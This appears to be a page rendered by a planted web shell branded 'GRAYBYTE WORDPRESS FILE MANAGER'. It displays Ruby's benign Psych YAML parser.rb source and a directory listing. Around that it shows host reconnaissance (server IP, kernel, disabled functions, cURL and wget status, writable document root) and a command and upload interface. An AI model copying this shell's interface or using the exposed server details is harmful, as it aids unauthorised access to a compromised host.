GRAYBYTE WORDPRESS FILE MANAGER4174

Server IP : 198.54.121.189 / Your IP : 216.73.216.112
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /opt/alt/ruby19/lib64/ruby/1.9.1/psych/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /opt/alt/ruby19/lib64/ruby/1.9.1/psych//parser.rb
module Psych
  ###
  # YAML event parser class.  This class parses a YAML document and calls
  # events on the handler that is passed to the constructor.  The events can
  # be used for things such as constructing a YAML AST or deserializing YAML
  # documents.  It can even be fed back to Psych::Emitter to emit the same
  # document that was parsed.
  #
  # See Psych::Handler for documentation on the events that Psych::Parser emits.
  #
  # Here is an example that prints out ever scalar found in a YAML document:
  #
  #   # Handler for detecting scalar values
  #   class ScalarHandler < Psych::Handler
  #     def scalar value, anchor, tag, plain, quoted, style
  #       puts value
  #     end
  #   end
  #
  #   parser = Psych::Parser.new(ScalarHandler.new)
  #   parser.parse(yaml_document)
  #
  # Here is an example that feeds the parser back in to Psych::Emitter.  The
  # YAML document is read from STDIN and written back out to STDERR:
  #
  #   parser = Psych::Parser.new(Psych::Emitter.new($stderr))
  #   parser.parse($stdin)
  #
  # Psych uses Psych::Parser in combination with Psych::TreeBuilder to
  # construct an AST of the parsed YAML document.

  class Parser
    class Mark < Struct.new(:index, :line, :column)
    end

    # The handler on which events will be called
    attr_accessor :handler

    # Set the encoding for this parser to +encoding+
    attr_writer :external_encoding

    ###
    # Creates a new Psych::Parser instance with +handler+.  YAML events will
    # be called on +handler+.  See Psych::Parser for more details.

    def initialize handler = Handler.new
      @handler = handler
      @external_encoding = ANY
    end
  end
end

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
March 03 2024 22:50:37
root / root
0755
handlers
--
March 03 2024 22:48:05
root / linksafe
0755
json
--
March 03 2024 22:48:05
root / linksafe
0755
nodes
--
March 03 2024 22:48:05
root / linksafe
0755
visitors
--
March 03 2024 22:48:05
root / linksafe
0755
coder.rb
2.02 KB
January 19 2011 23:05:53
root / linksafe
0644
core_ext.rb
0.855 KB
March 29 2012 01:25:11
root / linksafe
0644
deprecated.rb
2.402 KB
June 13 2011 03:54:53
root / linksafe
0644
handler.rb
6.667 KB
August 07 2012 20:50:05
root / linksafe
0644
nodes.rb
2.325 KB
May 15 2011 11:55:52
root / linksafe
0644
omap.rb
0.044 KB
March 30 2010 10:46:06
root / linksafe
0644
parser.rb
1.642 KB
March 29 2012 01:25:11
root / linksafe
0644
scalar_scanner.rb
3.29 KB
March 29 2012 01:25:11
root / linksafe
0644
set.rb
0.043 KB
March 30 2010 10:46:06
root / linksafe
0644
stream.rb
0.831 KB
May 15 2011 11:55:52
root / linksafe
0644
streaming.rb
0.472 KB
February 26 2011 13:59:48
root / linksafe
0644
syntax_error.rb
0.513 KB
March 29 2012 01:46:14
root / linksafe
0644
tree_builder.rb
2.055 KB
March 29 2012 01:25:11
root / linksafe
0644
visitors.rb
0.201 KB
January 21 2011 19:11:53
root / linksafe
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF